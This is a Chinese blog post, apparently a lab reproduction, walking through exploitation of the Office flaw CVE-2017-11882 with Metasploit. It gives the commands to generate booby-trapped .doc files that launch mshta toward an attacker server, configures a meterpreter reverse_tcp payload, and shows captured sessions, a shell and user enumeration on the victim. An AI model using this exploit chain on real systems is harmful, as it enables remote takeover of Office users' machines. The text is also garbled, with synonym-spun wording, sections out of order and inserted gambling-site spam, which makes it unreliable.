CVE-2017-11882错误疏失 Msf利用复现

 

0x02 利用进度

  1. 生成doc

    #安装运维nginx [root@ihoneysec ~]# yum -y install nginx [root@ihoneysec ~]# cd /usr/share/nginx/html/
    [root@ihoneysec html]# systemctl start nginx

    #下载生成doc的python脚本 [root@ihoneysec ~]# git clone [root@ihoneysec ~]# cd CVE-2017-11882/ [root@ihoneysec CVE-2017-11882]# ls Command109b_CVE-2017-11882.py Command43b_CVE-2017-11882.py example README.md

    #生成测验doc [root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o cve.doc [*] Done ! output file --> cve.doc [root@ihoneysec CVE-2017-11882]# cp cve.doc /usr/share/nginx/html/

    #生成msf利用的doc [root@ihoneysec CVE-2017-11882]# python Command43b2020欧洲杯官方投注-2020欧洲杯官方投注网址,_CVE-2017-11882.py -c "mshta " -o cve2.doc [*] Done ! output file --> cve2.doc [root@ihoneysec CVE-2017-11882]# cp cve2.doc /usr/share/nginx/html/

    #放到网址根目录 [root@ihoneysec CVE-2017-11882]# ls /usr/share/nginx/html/ 404.html 50x.html cve.doc cve2.doc index.html nginx-logo.png poweredby.png

  

  1. 测量检验平常弹出calc.exe总括器

2020欧洲杯官方投注-2020欧洲杯官方投注网址 1

 

  1. kali msf配置Poc:

    root@kali:~# cd / # 将下载好的尾巴模块放在msf大肆目录下 root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ # 检查ip地址 root@kali:/mnt/hgfs/kalishare# ifconfig eth0: flags=4163 mtu 1500

         inet 172.16.253.76  netmask 255.255.0.0  broadcast 172.16.255.255
         inet6 fe80::20c:29ff:fef5:82af  prefixlen 64  scopeid 0x20<link>
         ether 00:0c:29:f5:82:af  txqueuelen 1000  (Ethernet)
         RX packets 3136  bytes 987402 (964.2 KiB)
         RX errors 0  dropped 0  overruns 0  frame 0
         TX packets 255  bytes 20912 (20.4 KiB)
         TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    

    # 启动postgresql服务,打开msf root@kali:/mnt/hgfs/kalishare# service postgresql start
    root@kali:/mnt/hgfs/kalishare# msfconsole

    ...

        =[ metasploit v4.16.6-dev                          ]
    
    • -- --=[ 1683 exploits - 964 auxiliary - 297 post ]
    • -- --=[ 498 payloads - 40 encoders - 10 nops ]
    • -- --=[ Free Metasploit Pro trial: ] # 搜索cve_2017_11882 漏洞模块 msf > search cve_2017_11882

      Matching Modules

      Name Disclosure Date Rank Description


      exploit/windows/smb/cve_2017_11882 normal Microsoft Office Payload Delivery

      # 使用该模块 msf > use exploit/windows/smb/cve_2017_11882 # 设置payload为反弹tcp msf exploit(cve_2017_11882) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp # 设置本机ip msf exploit(cve_2017_11882) > set lhost 172.16.253.76 lhost => 172.16.253.76 # 设置uri的门径,要与第一步生成doc时安插风流倜傥致 msf exploit(cve_2017_11882) > set UCRUISERIPATH abc U昂CoraIPATH => abc # 检查当前配备 msf exploit(cve_2017_11882) > show options

      Module options (exploit/windows/smb/cve_2017_11882): Name Current Setting Required Description


      SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH abc no The URI to use for this exploit (default is random)

      Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description


      EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 172.16.253.76 yes The listen address LPORT 4444 yes The listen port

      ...

      # 运转利用后,msf会监听本机8080端口,纵然win7机器张开doc触发访谈172.16.253.76:8080/abc就能够赢得反弹到4444端口的tcp会话 msf exploit(cve_2017_11882) > exploit [] Exploit running as background job 0. # 开端监听 [] Started reverse TCP handler on 172.16.253.76:4444 msf exploit(cve_2017_11882) > [] Using URL: [] Local IP: [] Server started. [] Place the following DDE in an MS document: mshta.exe "" msf exploit(cve_2017_11882) > [] 172.16.253.4 cve_2017_11882 - Delivering payload [] Sending stage (179267 bytes) to 172.16.253.4 #收到反弹tcp连接 [] Meterpreter session 1 opened (172.16.253.76:4444 -> 172.16.253.4:49272) at 2017-11-23 15:14:06 +0800 [] 172.16.253.4 cve_2017_11882 - Delivering payload [] Sending stage (179267 bytes) to 172.16.253.4 [] Meterpreter session 2 opened (172.16.253.76:4444 -> 172.16.253.4:49274) at 2017-11-23 15:14:17 +0800

      msf exploit(cve_2017_11882) > msf exploit(cve_2017_11882) > msf exploit(cve_2017_11882) > sessions # 查看已经创立的反弹会话

      Active sessions

      Id Type Information Connection


      1 meterpreter x86/windows win7-PCwin7 @ WIN7-PC 172.16.253.76:4444 -> 172.16.253.4:49272 (172.16.253.4) # 进入id为1的会话 msf exploit(cve_2017_11882) > sessions -i 1 [*] Starting interaction with 1... # 验证获得反弹连接是还是不是是win7机器ip meterpreter > ipconfig

      Interface 11

      Name : Intel(R) PRO/1000 MT Network Connection Hardware MAC : 00:0c:29:72:2e:7d MTU : 1500 IPv4 Address : 172.16.253.4 IPv4 Netmask : 255.255.0.0 IPv6 Address : fe80::c15d:3813:94ec:d6c8 IPv6 Netmask : ffff:ffff:ffff:ffff::

      ...... # 踏入命令情势meterpreter > shell Process 2924 created. Channel 1 created. Microsoft Windows [�汾 6.1.7601] ��Ȩ���� (c) 二零一零 Microsoft Corporation����������Ȩ���� # 查看当前系统客户、主机名 C:Windowssystem32>net user net user

      WIN7-PC ���û��ʻ�


    Administrator Guest win7
    �����ɹ����ɡ�

C:Windowssystem32>

  

 

2020欧洲杯官方投注-2020欧洲杯官方投注网址 2

 

cd Desktop

0x00 漏洞简要介绍

二零一七年5月19日,微软发表了7月份的安全补丁更新,在那之中相比较引人关怀的其实悄然修复了隐蔽17年之久的Office远程代码推行漏洞(CVE-2017-11882卡塔尔国。该漏洞为Office内部存款和储蓄器破坏漏洞,影响当下盛行的全体Office版本。攻击者能够选择漏洞以当下登入的顾客的地位施行大肆命令。 由于漏洞影响面较广,漏洞透露后,金睛安全斟酌集体持续对漏洞有关攻击事件展开关爱。5月三日,监控到了原来就有漏洞POC在互连网流传,随时连忙对有关样板举行了剖析。近日该样品全球仅微软杀毒能够检查实验。

  • 漏洞影响版本:
  • Office 365
  • Microsoft Office 2000
  • Microsoft Office 2003
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

 

 

 

using url,local ip,,,

深夜时候接收了推送的错误疏失预先警告,在英特网搜寻相关音信来看数不胜数大拿已经付出出生成doc文书档案的脚本和msf的poc,本文记录CVE-2017-11882 漏洞在 Msf下的施用。

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

0x01 利用工具清单:

a) tcp反弹:kali 172.16.253.76 

b) 安装office2013的系统:win7 172.16.253.4

 

  1. Msf 用到的 Poc

  2. office二〇一二、激活工具

  3. win7旗舰版ISO镜像

上述工具已经打包好,下载地址:

链接:  密码:xl91

2020欧洲杯官方投注-2020欧洲杯官方投注网址 3

 

set lhost 192.168.1.104

 

预备阶段:

应用的方法很简短,实践上面发号出令,生成漏洞doc文件。

输入指令:python Command43b_CVE-2017-11882.py -c "mshta " -o test.doc

切切实实请看截图,至此CVE-2017-11882尾巴使用结束,上边还能举行豆蔻梢头雨后春笋渗透了。

 

前边说起,大家是把py文件放 kali 桌面包车型大巴,所以在 kali 试行的时候路线要在意。

reg add "HKLMSOFTWAREWow6432NodeMicrosoftOfficeXX.XCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD/d 0x400

kali:192.168.104

 

 

1.下载微软对此漏洞补丁:

 

 

set uripath abc

会出现 started reverse tcp hander on 192.168.1.104:4444

mshta.exe ""

那边小编留神说一下,希望每种人都能看懂。

动用office 二零一一开发,直接实践。

exploit

 

打响再次回到 shell。

reg add "HKLMSOFTWAREMicrosoftOfficeXX.XCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

 2020欧洲杯官方投注-2020欧洲杯官方投注网址 4

会在同目录生成 test.doc 文件。

接下去输入指令:search PS_shell

 

POC地址:

这里有个小手艺,因为命令长度有43字符的限量,能够利用UENVISIONIPATH设置路线,尽量短一点,防止加起来超越43字符。

本文链接(

 

 

接下来复制到 win7里面用 office二〇一二张开。

本文由2020欧洲杯官方投注-2020欧洲杯官方投注网址发布于win7,转载请注明出处:CVE-2017-11882错误疏失 Msf利用复现

相关阅读